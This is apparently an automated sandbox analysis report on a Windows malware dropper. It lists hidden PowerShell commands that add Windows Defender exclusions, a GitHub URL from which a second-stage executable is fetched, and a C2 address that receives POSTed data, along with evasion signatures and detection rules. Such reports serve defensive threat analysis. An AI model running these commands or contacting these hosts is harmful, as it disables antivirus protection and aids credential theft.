Windows Analysis Report
1feP5qTCl0.exe

Overview

General Information

Sample name: 1feP5qTCl0.exe (renamed because original name is a hash value)
Original sample name: 64aaffe3b4d705b9ddbce60e8fd8b9829c20438b8c68ae254e185c0f466e0265.exe
Analysis ID: 1499701
MD5: a499c507987982c951093e21df0c0d96
SHA1: fa1a7050198570e016fc4bf3ddd69160e05a8a38
SHA256: 64aaffe3b4d705b9ddbce60e8fd8b9829c20438b8c68ae254e185c0f466e0265
Tags: 45-125-66-18, exe

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found evasive API chain (may stop execution after checking mutex)
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Installs new ROOT certificates
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Query firmware table information (likely to detect VMs)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Stores large binary data to the registry
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64
  • 1feP5qTCl0.exe (PID: 6120 cmdline: "C:\Users\user\Desktop\1feP5qTCl0.exe" MD5: A499C507987982C951093E21DF0C0D96)
    • powershell.exe (PID: 6024 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5772 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5660 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6776 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 480 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 1196 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4144 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 1308 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 4996 cmdline: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • rapnewsa.exe (PID: 6044 cmdline: C:\Reka\rapnewsa.exe MD5: 2D4E723C184D9403B078E53F2DE74A23)
      • WerFault.exe (PID: 3992 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 56480 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1feP5qTCl0.exe", ParentImage: C:\Users\user\Desktop\1feP5qTCl0.exe, ParentProcessId: 6120, ParentProcessName: 1feP5qTCl0.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 6024, ProcessName: powershell.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\1feP5qTCl0.exe", ParentImage: C:\Users\user\Desktop\1feP5qTCl0.exe, ParentProcessId: 6120, ParentProcessName: 1feP5qTCl0.exe, ProcessCommandLine: powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'", ProcessId: 6024, ProcessName: powershell.exe
No Suricata rule has matched

AV Detection

Source: C:\Reka\rapnewsa.exe | Avira: detection malicious, Label: HEUR/AGEN.1315917
Source: C:\Reka\rapnewsa.exe | ReversingLabs: Detection: 15%
Source: C:\Reka\rapnewsa.exe | Virustotal: Detection: 24%
Source: 1feP5qTCl0.exe | Virustotal: Detection: 8%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Reka\rapnewsa.exe | Joe Sandbox ML: detected
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A41000 CryptUnprotectData,19_2_00A41000
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A41C40 CryptSignHashA,CryptUpdateProtectedState,WinHttpTimeFromSystemTime,19_2_00A41C40
Source: unknown | HTTPS traffic detected: 45.125.66.18:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: 1feP5qTCl0.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A48D40 FindFirstFileW,FindNextFileW,FindClose,19_2_00A48D40
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\
Source: C:\Reka\rapnewsa.exe | File opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\
Source: Joe Sandbox View | IP Address: 185.199.109.133
Source: Joe Sandbox View | IP Address: 140.82.121.3
Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
Source: global traffic | HTTP traffic detected: POST /api/receiver/recv HTTP/1.1; Connection: Keep-Alive; Content-Type: application/octet-stream; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48; Content-Length: 3160; Host: 45.125.66.18
Source: unknown | TCP traffic detected without corresponding DNS query: 45.125.66.18
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /workhasf/kelm/main/yjsefceawd.json HTTP/1.1; Host: raw.githubusercontent.com; User-Agent: Go-http-client/1.1; Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /workhasf/kelm/main/nepipirusas.json HTTP/1.1; Host: raw.githubusercontent.com; User-Agent: Go-http-client/1.1; Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /workhasf/kelm/raw/main/iconozave.exe HTTP/1.1; Host: github.com; User-Agent: Go-http-client/1.1; Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /workhasf/kelm/main/iconozave.exe HTTP/1.1; Host: raw.githubusercontent.com; User-Agent: Go-http-client/1.1; Referer: https://github.com/workhasf/kelm/raw/main/iconozave.exe; Accept-Encoding: gzip
Source: global traffic | HTTP traffic detected: GET /get HTTP/1.1; Host: httpbin.org; User-Agent: Go-http-client/1.1; Accept-Encoding: gzip
Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic | DNS traffic detected: DNS query: github.com
Source: global traffic | DNS traffic detected: DNS query: httpbin.org
Source: unknown | HTTP traffic detected: POST /api/receiver/recv HTTP/1.1; Connection: Keep-Alive; Content-Type: application/octet-stream; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.48; Content-Length: 3160; Host: 45.125.66.18
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://microsoft.co
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://45.125.66.18/api/receiver/recv
Source: rapnewsa.exe, 00000013.00000002.2038436475.000000000118E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://45.125.66.18/api/receiver/recvS
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://45.125.66.18/api/receiver/recvz
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011A8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://45.125.66.18/l9
Source: rapnewsa.exe, 00000013.00000002.2038436475.00000000011CA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://45.125.66.18:443/api/receiver/recv
Source: 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com
Source: 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C000142000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C00000E000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C0000FC000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C00017C000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exe
Source: 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C00000E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exeC:
Source: 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00020C000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://github.com/workhasf/kelm/raw/main/iconozave.exeraw.githubusercontent.comdefault-src
Source: 1feP5qTCl0.exe, 00000000.00000002.2048398307.000000C000086000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2050263367.000000C00019A000.00000004.00001000.00020000.00000000.sdmp, 1feP5qTCl0.exe, 00000000.00000002.2050595870.000000C00027E000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://httpbin.org/get
Source: 1feP5qTCl0.exe, 00000000.00000002.2050263367.000000C0001A6000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/workhasf/kelm/main/iconozave.exe
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown | Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49739 -> 443
Source: 1feP5qTCl0.exe | Binary or memory string: github.com/lxn/win.getRawInputData
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A41470 NtQuerySystemInformation,OpenProcess,GetCurrentProcess,DuplicateHandle,GetFileType,CloseHandle,GetCurrentProcess,DuplicateHandle,CloseHandle,FindCloseChangeNotification,19_2_00A41470
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A43D50 NtClose,NtClose,19_2_00A43D50
Source: C:\Reka\rapnewsa.exe | Code function: 19_2_00A41610 NtQueryObject,NtQueryObject,19_2_00A41610
Source: C:\Reka\rapnewsa.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 56480
Source: 1feP5qTCl0.exe | Static PE information: Number of sections : 15 > 10
Source: 1feP5qTCl0.exe | Static PE information: Section: /19 ZLIB complexity 0.9991581357758621
Source: 1feP5qTCl0.exe | Static PE information: Section: /32 ZLIB complexity 0.9933081454918032
Source: 1feP5qTCl0.exe | Static PE information: Section: /65 ZLIB complexity 0.9992535231210021
Source: 1feP5qTCl0.exe | Static PE information: Section: /78 ZLIB complexity 0.9908877648782687
Source: classification engine | Classification label: mal100.evad.winEXE@25/31@3/4
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | File created: C:\Users\user\Desktop\new_example.txt
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6568:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4040:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:420:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5780:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1196:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1800:120:WilError_03
Source: C:\Reka\rapnewsa.exe | Mutant created: \Sessions\1\BaseNamedObjects\082e2202-17f7-4654-a651-ac9a3778e1d7
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxinlifc.kli.ps1
Source: C:\Users\user\Desktop\1feP5qTCl0.exeFile opened: C:\Windows\system32\83d23f67a6248ede6b2eccd5ae8fcac6e57d0b7d0fac7f974a81445ec731c106AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
Source: 1feP5qTCl0.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Reka\rapnewsa.exe | System information queried: HandleInformation
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 1feP5qTCl0.exeString found in binary or memory: failed to construct HKDF label: %sslice bounds out of range [:%x:%y]slice bounds out of range [%x:%y:]out of memory allocating allArenas/memory/classes/heap/objects:bytesruntime.SetFinalizer: cannot pass too many pages allocated in chunk?mspan.ensureSwept: m is not lockedVirtualQuery for stack base failedforEachP: sched.safePointWait != 0schedule: spinning with local workruntime: g is running but p is notdoaddtimer: P already set in timerunexpected runtime.netpoll error: crypto/rsa: missing public modulusadding nil Certificate to CertPoolx509: unknown public key algorithmx509: invalid certificate policies%s %q is excluded by constraint %qx509: Ed25519 verification failurex509: unhandled critical extensioncrypto/aes: invalid buffer overlapcrypto/des: invalid buffer overlapcrypto/rc4: invalid buffer overlapinvalid padding bits in BIT STRINGGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizehttp: server closed idle connectionCONTINUATION frame with stream ID 02006-01-02T15:04:05.999999999Z07:00executable file not found in %PATH%network dropped connection on resettransport endpoint is not connectedSubscribeServiceChangeNotificationsreflect.MakeSlice of non-slice type1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9unsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKmime: bogus characters after %%: %qpersistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=hpack: invalid Huffman-encoded datadynamic table size update too largefile type 
does not support deadlinebigmod: modulus is smaller than natx509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesscrypto/md5: invalid hash state sizetoo many Questions to pack (>65535)flate: corrupt input before offset '_' must separate successive digitsP224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitysuperfluous leading zeros in lengthchacha20: output smaller than inputtransform: short destination bufferAdd-MpPreference -ExclusionPath '%s'json: encoding error for type %q: %qhttp: unexpected EOF reading trailer LastStreamID=%v ErrCode=%v Debug=%qRoundTrip retrying after failure: %vno acceptable authentication methodsstrings.Builder.Grow: negative countstrings: Join output length overflowaccessing a corrupted shared libraryTime.UnmarshalBinary: invalid lengthmethod ABI and value ABI don't align444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzexp
Source: 1feP5qTCl0.exe | String found in binary or memory: C:/Program Files/Go/src/net/addrselect.go
Source: unknown | Process created: C:\Users\user\Desktop\1feP5qTCl0.exe "C:\Users\user\Desktop\1feP5qTCl0.exe"
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Users'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Windows'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Program Files (x86)'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Recovery'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:\Reka'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath '%USERPROFILE%\Desktop'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Process created: C:\Reka\rapnewsa.exe C:\Reka\rapnewsa.exe
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: powrprof.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: umpdc.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\1feP5qTCl0.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Reka\rapnewsa.exe Section loaded: apphelp.dll
Source: C:\Reka\rapnewsa.exe Section loaded: winhttp.dll
Source: C:\Reka\rapnewsa.exe Section loaded: dpapi.dll
Source: C:\Reka\rapnewsa.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Reka\rapnewsa.exe Section loaded: uxtheme.dll
Source: C:\Reka\rapnewsa.exe Section loaded: webio.dll
Source: C:\Reka\rapnewsa.exe Section loaded: mswsock.dll
Source: C:\Reka\rapnewsa.exe Section loaded: iphlpapi.dll
Source: C:\Reka\rapnewsa.exe Section loaded: winnsi.dll
Source: C:\Reka\rapnewsa.exe Section loaded: sspicli.dll
Source: C:\Reka\rapnewsa.exe Section loaded: schannel.dll
Source: C:\Reka\rapnewsa.exe Section loaded: mskeyprotect.dll
